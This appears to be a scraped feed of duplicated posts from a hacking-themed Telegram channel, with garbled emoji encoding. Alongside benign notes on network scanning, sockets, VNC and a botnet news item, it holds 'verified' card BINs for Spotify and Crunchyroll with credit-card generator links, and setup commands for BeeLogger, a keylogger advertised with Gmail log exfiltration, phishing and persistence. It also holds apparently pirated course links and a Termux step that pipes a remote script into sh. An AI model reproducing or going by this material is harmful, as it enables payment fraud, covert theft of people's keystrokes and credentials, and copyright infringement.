Forwarded from Backup Legal Mega
๐ฆSOC Analyst Cyber Security Intrusion Training for beginer & advanced New
https://mega.nz/folder/ExV3mITb#7eCbqf1Fzrf6x5TyVea9Hw/folder/Rw9lRYxB
https://mega.nz/folder/ExV3mITb#7eCbqf1Fzrf6x5TyVea9Hw/folder/Rw9lRYxB
mega.nz
File folder on MEGA
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆRandom Key terms:
>Feeder - Source of IP addresses for scanning. Angry IP Scanner provides various scanning sources: IP Range, IP List File or Random. You can select a source from the drop-down list next to the "Start" button
>Data collector - collects specific information about the host, for example, ping time, host name, open ports. Collectors are usually columns as a result of a scan. They can be selected in the menu "Tools-> Data Collectors".
>Active host - the host responding to ping. The results sheet is marked in blue.
>Inactive host - a host that does not respond to ping (red). However, it may have open ports (if the firewall blocks ping). In order to fully scan such hosts, check the "Scan inactive" checkbox in Tools-> Preferences.
>Pinging (host check):
>ICMP echo is the standard method used by the 'ping' program. On most platforms, requires administrator privileges. Some firewalls prohibit response packets to an ICMP request, making active hosts look inactive.
>UDP - sends UDP packets (datagrams) to one of the host ports and monitors the response (whether or not). Not standard, but does not require privileges.
>TCP - trying to connect to the 80 (http) port. UDP may work better for some networks, usually not.
>Scanning UDP and TCP most often does not detect routers or other network equipment properly
> Open port - TCP port that responded to the connection attempt. Greens on the list.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆRandom Key terms:
>Feeder - Source of IP addresses for scanning. Angry IP Scanner provides various scanning sources: IP Range, IP List File or Random. You can select a source from the drop-down list next to the "Start" button
>Data collector - collects specific information about the host, for example, ping time, host name, open ports. Collectors are usually columns as a result of a scan. They can be selected in the menu "Tools-> Data Collectors".
>Active host - the host responding to ping. The results sheet is marked in blue.
>Inactive host - a host that does not respond to ping (red). However, it may have open ports (if the firewall blocks ping). In order to fully scan such hosts, check the "Scan inactive" checkbox in Tools-> Preferences.
>Pinging (host check):
>ICMP echo is the standard method used by the 'ping' program. On most platforms, requires administrator privileges. Some firewalls prohibit response packets to an ICMP request, making active hosts look inactive.
>UDP - sends UDP packets (datagrams) to one of the host ports and monitors the response (whether or not). Not standard, but does not require privileges.
>TCP - trying to connect to the 80 (http) port. UDP may work better for some networks, usually not.
>Scanning UDP and TCP most often does not detect routers or other network equipment properly
> Open port - TCP port that responded to the connection attempt. Greens on the list.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆSome Verified Binsโ
BIN SPOTIFY PREMIUM
BIN: 5227147432xxxxxx
FECHA: Generado
CVV: Generado
IP ITALIA ๐ฎ๐น
ZIP CODE: 10080
๐ฆNEW BIN CRUNCHYROLL
BIN: 437507010xxxxxxx
FECHA: 03/24
CVV: Generado
IP: USA ๐บ๐ธ
ZIP CODE: 10080
> only verified by us
๐งโโ๏ธBest Cc generator https://t.me/UNDERCODEHACKING/2150
BIN SPOTIFY PREMIUM
BIN: 5227147432xxxxxx
FECHA: Generado
CVV: Generado
IP ITALIA ๐ฎ๐น
ZIP CODE: 10080
๐ฆNEW BIN CRUNCHYROLL
BIN: 437507010xxxxxxx
FECHA: 03/24
CVV: Generado
IP: USA ๐บ๐ธ
ZIP CODE: 10080
> only verified by us
๐งโโ๏ธBest Cc generator https://t.me/UNDERCODEHACKING/2150
Telegram
UNDERCODE HACKING
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ57 New cc generator list
1) https://namso-gen.com
2) http://namso.ezyro.com/?i=1
3) http://archive.li/gvfdN
4) https://ia1000.com
6) http://sourcebinccgen.ml/CCGENSBC1/
7) http://sourcebinccgen.ml/CCGENSBC2/
8) https://obtainโฆ
๐ฆ57 New cc generator list
1) https://namso-gen.com
2) http://namso.ezyro.com/?i=1
3) http://archive.li/gvfdN
4) https://ia1000.com
6) http://sourcebinccgen.ml/CCGENSBC1/
7) http://sourcebinccgen.ml/CCGENSBC2/
8) https://obtainโฆ
Malware Traffic Analysis Exercise (July 2019) .pdf
480.6 KB
Mlaware Traffic Analysis #Exercise
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆSites for gift Cards Top Rated in 2020 :
> https://grindabuck.com/
> https://grny.io/2FAC5BX
> https://www.instagc.com/1697927
>https://www.anrdoezrs.net/click-7068738-13997154/ref/a0sq8i
> https://go.wellkeptwallet.com/surveyjunkienew
> https://wellkeptwallet.com/get-paid-play-games-online/
> https://www.thewaystowealth.com/fetch
> https://www.thewaystowealth.com/ibotta (app)
> https://www.thewaystowealth.com/drop
> https://www.thewaystowealth.com/sba
> https://go.millennialmoney.com/inboxdollars/?pd00=30347&pd02=L2kDatx712dX
enjoyguys โค๏ธ๐
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆSites for gift Cards Top Rated in 2020 :
> https://grindabuck.com/
> https://grny.io/2FAC5BX
> https://www.instagc.com/1697927
>https://www.anrdoezrs.net/click-7068738-13997154/ref/a0sq8i
> https://go.wellkeptwallet.com/surveyjunkienew
> https://wellkeptwallet.com/get-paid-play-games-online/
> https://www.thewaystowealth.com/fetch
> https://www.thewaystowealth.com/ibotta (app)
> https://www.thewaystowealth.com/drop
> https://www.thewaystowealth.com/sba
> https://go.millennialmoney.com/inboxdollars/?pd00=30347&pd02=L2kDatx712dX
enjoyguys โค๏ธ๐
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
Instagc
Instant Gift Cards
Get free gift cards by completing tasks, surveys, videos, plus more. Over 1,426,000+ gift cards redeemed. Free to join.
Forwarded from Backup Legal Mega
Udacity - Data Science Complet ! โ54.05 GBโ
after 10 Tb courses this good to learn & earn ๐
>Learn data science from industry experts.
>youโll learn to solve data-rich problems and apply this knowledge to your big data needs.
> Whether youโre new to the field or looking for additional training, we have introductory, advanced, and industry-specific courses to meet your learning goals.
https://mega.nz/#F!qrpxSIRD!PClG5ZMHdd5FroIFTT_Z5Q
after 10 Tb courses this good to learn & earn ๐
>Learn data science from industry experts.
>youโll learn to solve data-rich problems and apply this knowledge to your big data needs.
> Whether youโre new to the field or looking for additional training, we have introductory, advanced, and industry-specific courses to meet your learning goals.
https://mega.nz/#F!qrpxSIRD!PClG5ZMHdd5FroIFTT_Z5Q
mega.nz
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆLINUX-tERMUX BEELOGGER
FEATURES:
>Send logs each 120 seconds.
>Send logs when chars > 50.
>Send logs with GMAIL.
>Some Phishing methods are included.
>Multiple Session disabled.
>Auto Persistence.
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
1๏ธโฃ
enjoyโค๏ธ๐๐ป
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆLINUX-tERMUX BEELOGGER
FEATURES:
>Send logs each 120 seconds.
>Send logs when chars > 50.
>Send logs with GMAIL.
>Some Phishing methods are included.
>Multiple Session disabled.
>Auto Persistence.
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
1๏ธโฃ
git clone https://github.com/4w4k3/BeeLogger.git
Running:
2๏ธโฃcd BeeLogger
3๏ธโฃsudo su
4๏ธโฃchmod +x install.sh
5๏ธโฃ./install.sh
6๏ธโฃpython bee.py
If you have another version of Python:
python2.7 bee.py
7๏ธโฃchoose options via numbersfor learn !
Use
enjoyโค๏ธ๐๐ป
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆ Outlaw botnet infects about 20,000 Linux servers, Tencent security reminds enterprises to remove in time
#news
>The parent file transmitted by this attack is dota3.tar.gz, which may be the third version of the Outlaw botnet. The parent file releases a shell script to start the corresponding binary program. kswapd0 is responsible for mining Monero, tsm32, tsm64 is responsible for continuing the SSH blast attack to spread the virus.
>The Outlaw botnet was previously distributed by exploiting the Shellshock vulnerability, so it was named "Shellbot". Shellbot uses common command injection vulnerabilities on Internet of Things (IoT) devices and Linux servers to infect. The Shellshock vulnerability (CVE-2014-7169) is a serious vulnerability discovered in the Bash command shell in 2014. Most Linux distributions usually use this feature, and attackers can remotely execute code on these affected Linux servers.
>Outlaw botnets use SSH to blast intrusive attacks, which can be detected
> Cloud Firewall can detect the mining behavior of Outlaw botnet, Shellshock exploit and brute force cracking of SSH login password and other attack activities.
At present, the impact of the Outlaw botnet is still spreading, causing serious harm to enterprise servers. Tencent security products have taken emergency response measures
@undercodeNews
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆ Outlaw botnet infects about 20,000 Linux servers, Tencent security reminds enterprises to remove in time
#news
>The parent file transmitted by this attack is dota3.tar.gz, which may be the third version of the Outlaw botnet. The parent file releases a shell script to start the corresponding binary program. kswapd0 is responsible for mining Monero, tsm32, tsm64 is responsible for continuing the SSH blast attack to spread the virus.
>The Outlaw botnet was previously distributed by exploiting the Shellshock vulnerability, so it was named "Shellbot". Shellbot uses common command injection vulnerabilities on Internet of Things (IoT) devices and Linux servers to infect. The Shellshock vulnerability (CVE-2014-7169) is a serious vulnerability discovered in the Bash command shell in 2014. Most Linux distributions usually use this feature, and attackers can remotely execute code on these affected Linux servers.
>Outlaw botnets use SSH to blast intrusive attacks, which can be detected
> Cloud Firewall can detect the mining behavior of Outlaw botnet, Shellshock exploit and brute force cracking of SSH login password and other attack activities.
At present, the impact of the Outlaw botnet is still spreading, causing serious harm to enterprise servers. Tencent security products have taken emergency response measures
@undercodeNews
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
Forwarded from Backup Legal Mega
SOC Analyst Cyber Security Intrusion Training from Scratch
https://mega.nz/folder/ExV3mITb#7eCbqf1Fzrf6x5TyVea9Hw/folder/Rw9lRYxB
https://mega.nz/folder/ExV3mITb#7eCbqf1Fzrf6x5TyVea9Hw/folder/Rw9lRYxB
mega.nz
File folder on MEGA
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow do multiple WAN routers set the internal IP to correspond to the fixed WAN port? LAN IP address settings
How do multiple WAN routers set the intranet IP to correspond to a fixed WAN port? There are a lot of broadband, in order to ensure the network speed, I want to let some computers take the top route, so that the speed of the distribution network is very fast, we need to set the LAN IP address, let's take a look at the detailed tutorial, friends You can refer to
> When using multiple broadband, in order to ensure that some special computers have sufficient speed, we can let these computers take the designated route and separate from other computers. Next, let's operate how to set the specified LAN IP from the specified WAN port of the multi-WAN router.
1๏ธโฃ First, set up an address group, and put the IPs to be specially processed into a group.
2๏ธโฃ Open the " Routing Settings " in " Transmission Control "
3๏ธโฃ into the " policy PBR list of rules ", click " Add"
4๏ธโฃin the source address, select the IP address group to be set on the WAN2 port.
5๏ธโฃ Select " WAN2" for the effective interface and let it go to the WAN2 port.
6๏ธโฃOthers can keep the default, click " OK" to save the settings
7๏ธโฃNow you can go to test whether it has gone to the designated WAN port.
great! that's all
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆHow do multiple WAN routers set the internal IP to correspond to the fixed WAN port? LAN IP address settings
How do multiple WAN routers set the intranet IP to correspond to a fixed WAN port? There are a lot of broadband, in order to ensure the network speed, I want to let some computers take the top route, so that the speed of the distribution network is very fast, we need to set the LAN IP address, let's take a look at the detailed tutorial, friends You can refer to
> When using multiple broadband, in order to ensure that some special computers have sufficient speed, we can let these computers take the designated route and separate from other computers. Next, let's operate how to set the specified LAN IP from the specified WAN port of the multi-WAN router.
1๏ธโฃ First, set up an address group, and put the IPs to be specially processed into a group.
2๏ธโฃ Open the " Routing Settings " in " Transmission Control "
3๏ธโฃ into the " policy PBR list of rules ", click " Add"
4๏ธโฃin the source address, select the IP address group to be set on the WAN2 port.
5๏ธโฃ Select " WAN2" for the effective interface and let it go to the WAN2 port.
6๏ธโฃOthers can keep the default, click " OK" to save the settings
7๏ธโฃNow you can go to test whether it has gone to the designated WAN port.
great! that's all
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ The difference between file descriptors and file pointers:
#fastTips
> File descriptor: Open the file in the linux system to get the file descriptor, which is a small positive integer. Each process stores a file descriptor table in the PCB (Process Control Block). The file descriptor is the index of this table, and each entry has a pointer to the opened file.
> File pointer: The file pointer is used as the handle of I/O in C language. The file pointer points to a data structure called the FILE structure in the process user area. The FILE structure includes a buffer and a file descriptor. The file descriptor is an index of the file descriptor table, so in a sense, the file pointer is the handle of the handle (on Windows systems, the file descriptor is called the file handle).
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ The difference between file descriptors and file pointers:
#fastTips
> File descriptor: Open the file in the linux system to get the file descriptor, which is a small positive integer. Each process stores a file descriptor table in the PCB (Process Control Block). The file descriptor is the index of this table, and each entry has a pointer to the opened file.
> File pointer: The file pointer is used as the handle of I/O in C language. The file pointer points to a data structure called the FILE structure in the process user area. The FILE structure includes a buffer and a file descriptor. The file descriptor is an index of the file descriptor table, so in a sense, the file pointer is the handle of the handle (on Windows systems, the file descriptor is called the file handle).
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ What is Socket :
#prohack
1๏ธโฃ Socket socket:
Socket originated from Unix, and one of the basic philosophy of Unix/Linux is "everything is a file", which can be operated with the "open open -
> read/write -> close" mode. Socket is an implementation of this mode, socket is a special file, and some socket functions are operations on it (read/write IO, open, close).
> To put it plainly, Socket is the application layer to communicate with the TCP/IP protocol family The middleware abstraction layer is a set of interfaces. In the design mode, Socket is actually a facade mode. It hides the complex TCP/IP protocol family behind the Socket interface. For users, a simple set of interfaces is all. Let Socket organize the data to meet the specified protocol.
๐ณNote: In fact, the socket has no concept of layers, it is just a facade design pattern application, making programming easier. It is a software abstraction layer. In network programming, we use a lot of sockets.
2๏ธโฃThe socket descriptor is
actually an integer. The handles we are most familiar with are 0, 1, and 2, 0 is standard input, 1 is standard output, and 2 is standard error output. 0, 1, 2 are represented by integers, the corresponding FILE * structure is stdin, stdout, stderr
> The socket API was originally developed as part of the UNIX operating system, so the socket API is integrated with other I/O devices in the system. In particular, when an application wants to create a socket for Internet communication, the operating system returns a small integer as a descriptor to identify the socket. Then, the application program uses the descriptor as a transfer parameter to complete a certain operation by calling a function (such as transmitting data through the network or receiving input data).
3๏ธโฃIn many operating systems, socket descriptors and other I/O descriptors are integrated, so applications can perform socket I/O or I/O read/write operations on files.
4๏ธโฃWhen an application wants to create a socket, the operating system returns a small integer as a descriptor. The application uses this descriptor to refer to the socket. An application that requires an I/O request requests the operating system to open a file. The operating system creates a file descriptor for the application to access the file. From the perspective of the application, the file descriptor is an integer that the application can use to read and write files.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆ What is Socket :
#prohack
1๏ธโฃ Socket socket:
Socket originated from Unix, and one of the basic philosophy of Unix/Linux is "everything is a file", which can be operated with the "open open -
> read/write -> close" mode. Socket is an implementation of this mode, socket is a special file, and some socket functions are operations on it (read/write IO, open, close).
> To put it plainly, Socket is the application layer to communicate with the TCP/IP protocol family The middleware abstraction layer is a set of interfaces. In the design mode, Socket is actually a facade mode. It hides the complex TCP/IP protocol family behind the Socket interface. For users, a simple set of interfaces is all. Let Socket organize the data to meet the specified protocol.
๐ณNote: In fact, the socket has no concept of layers, it is just a facade design pattern application, making programming easier. It is a software abstraction layer. In network programming, we use a lot of sockets.
2๏ธโฃThe socket descriptor is
actually an integer. The handles we are most familiar with are 0, 1, and 2, 0 is standard input, 1 is standard output, and 2 is standard error output. 0, 1, 2 are represented by integers, the corresponding FILE * structure is stdin, stdout, stderr
> The socket API was originally developed as part of the UNIX operating system, so the socket API is integrated with other I/O devices in the system. In particular, when an application wants to create a socket for Internet communication, the operating system returns a small integer as a descriptor to identify the socket. Then, the application program uses the descriptor as a transfer parameter to complete a certain operation by calling a function (such as transmitting data through the network or receiving input data).
3๏ธโฃIn many operating systems, socket descriptors and other I/O descriptors are integrated, so applications can perform socket I/O or I/O read/write operations on files.
4๏ธโฃWhen an application wants to create a socket, the operating system returns a small integer as a descriptor. The application uses this descriptor to refer to the socket. An application that requires an I/O request requests the operating system to open a file. The operating system creates a file descriptor for the application to access the file. From the perspective of the application, the file descriptor is an integer that the application can use to read and write files.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTermux optimization :
> Terminal color
Mainly used zshto replace bashas the default shell. Use one-click installation script to install, one-step installation, by the way, external storage is started, and you can directly access the directory under the SD card.
1๏ธโฃ Execute the following command to ensure that curl is installed
> sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)"
2๏ธโฃAndroid 6.0 and above will pop up a box to confirm whether it is authorized.
3๏ธโฃAfter authorization, Termuxyou can easily access the SD card file. After the script allows, you have the following two options:
> Enter a number, leave blank to not to change: 14 Enter a number, leave blank to not to change: 6
> Select separately
> you want to continue to change the selection color, continue to run the script to filter again:
$ ~/termux-ohmyzsh/install.sh
exitRestart sessionssession effective configuration
4๏ธโฃAccess to external storage optimization :
> After executing the above zshone-click configuration script and granting file access permissions, a directory will be generated at home directory storageand several directories will be generated , and the soft links will all point to the corresponding directory of the external memory card
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆTermux optimization :
> Terminal color
Mainly used zshto replace bashas the default shell. Use one-click installation script to install, one-step installation, by the way, external storage is started, and you can directly access the directory under the SD card.
1๏ธโฃ Execute the following command to ensure that curl is installed
> sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)"
2๏ธโฃAndroid 6.0 and above will pop up a box to confirm whether it is authorized.
3๏ธโฃAfter authorization, Termuxyou can easily access the SD card file. After the script allows, you have the following two options:
> Enter a number, leave blank to not to change: 14 Enter a number, leave blank to not to change: 6
> Select separately
> you want to continue to change the selection color, continue to run the script to filter again:
$ ~/termux-ohmyzsh/install.sh
exitRestart sessionssession effective configuration
4๏ธโฃAccess to external storage optimization :
> After executing the above zshone-click configuration script and granting file access permissions, a directory will be generated at home directory storageand several directories will be generated , and the soft links will all point to the corresponding directory of the external memory card
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
Forwarded from Backup Legal Mega
๐ฆ100 Algorithms 2019
free (199$ price)
https://www.udemy.com/course/100-algorithms-challenge/
https://mega.nz/folder/fNA2SAiB#0jvqqi5TKRMCoPv5nbrAcg
free (199$ price)
https://www.udemy.com/course/100-algorithms-challenge/
https://mega.nz/folder/fNA2SAiB#0jvqqi5TKRMCoPv5nbrAcg
Udemy
100 Algorithms Challenge
How to Ace the JavaScript Coding Interview
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆVNC FOR BEGINERS
#FastTips
>The VNC Host: Display field is used to enter the host IP address and display number. In fact, usually the display number is not required.
>as example you can specify the port number if it differs from the standard one. The entries for IP: 1 (first display on IP) and IP: 5901 (port 5901 on IP) are identical. That is, 192.168.0.100:1 and 192.168.0.100:5901 for the program are one and the same.
> If after the colon you use the number <200, then the program thinks that you have indicated the display number and is trying to connect to port 5900 + n. If you need to use a TCP port less than 200, then specify a negative number, for example: 24.67.132.27:-80
In this field you can specify various protocols that will tell the program whether to use SSL, SSH, together or not to use anything at all. But, in my opinion, itโs easier to switch values in the graphical menu than to remember little-used notations.
>VNC Password - here you can specify the password for VNC authentication - you can leave the field blank and in this case the
>VNC viewer will display a password input dialog box.
>Proxy / Gateway - proxy and gateway, most users do not need this.
>Use SSL - use SSL
Use SSL + SSH - use SSL with SSH. This is usually not necessary, since SSH also provides encryption like SSL. In practice, it may be needed only with certain firewall settings to circumvent restrictions.
>None - do not use encryption, just start VNC viewer
>Save - save the profile with the entered settings
>Load - load a profile with the entered settings
Connecting with ssvnc using SSL
The server settings here and here said that you need to transfer the certificate to the client machine - it is this certificate that will be needed to encrypt traffic using SSL.
Important : SSL certificate can be replaced on the fly !!! That is, SSL encryption will prevent passive traffic interception, but if the attacker uses certificate substitution tools, then you are not protected from this attack!
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
๐ฆVNC FOR BEGINERS
#FastTips
>The VNC Host: Display field is used to enter the host IP address and display number. In fact, usually the display number is not required.
>as example you can specify the port number if it differs from the standard one. The entries for IP: 1 (first display on IP) and IP: 5901 (port 5901 on IP) are identical. That is, 192.168.0.100:1 and 192.168.0.100:5901 for the program are one and the same.
> If after the colon you use the number <200, then the program thinks that you have indicated the display number and is trying to connect to port 5900 + n. If you need to use a TCP port less than 200, then specify a negative number, for example: 24.67.132.27:-80
In this field you can specify various protocols that will tell the program whether to use SSL, SSH, together or not to use anything at all. But, in my opinion, itโs easier to switch values in the graphical menu than to remember little-used notations.
>VNC Password - here you can specify the password for VNC authentication - you can leave the field blank and in this case the
>VNC viewer will display a password input dialog box.
>Proxy / Gateway - proxy and gateway, most users do not need this.
>Use SSL - use SSL
Use SSL + SSH - use SSL with SSH. This is usually not necessary, since SSH also provides encryption like SSL. In practice, it may be needed only with certain firewall settings to circumvent restrictions.
>None - do not use encryption, just start VNC viewer
>Save - save the profile with the entered settings
>Load - load a profile with the entered settings
Connecting with ssvnc using SSL
The server settings here and here said that you need to transfer the certificate to the client machine - it is this certificate that will be needed to encrypt traffic using SSL.
Important : SSL certificate can be replaced on the fly !!! That is, SSL encryption will prevent passive traffic interception, but if the attacker uses certificate substitution tools, then you are not protected from this attack!
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซ6๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE COMMUNITY
_How_I_Chained_4_vulnerabilities_on_GitHub_Enterprise,_From_SSRF.pdf
700.9 KB
The most requested tutorial- full
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆRecommended to start-top-Related free tutorials for exploit
#resources
* [Shellcode Tutorial](http://www.vividmachines.com/shellcode/shellcode.html) - Tutorial on how to write shellcode.
* [Shellcode Examples](http://shell-storm.org/shellcode/) - Shellcodes database.
* [Exploit Writing Tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) - Tutorials on how to develop exploits.
๐ฆRecommended to start-top-Related free tutorials for exploit
#resources
* [Shellcode Tutorial](http://www.vividmachines.com/shellcode/shellcode.html) - Tutorial on how to write shellcode.
* [Shellcode Examples](http://shell-storm.org/shellcode/) - Shellcodes database.
* [Exploit Writing Tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) - Tutorials on how to develop exploits.
-as long as you learn the better
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ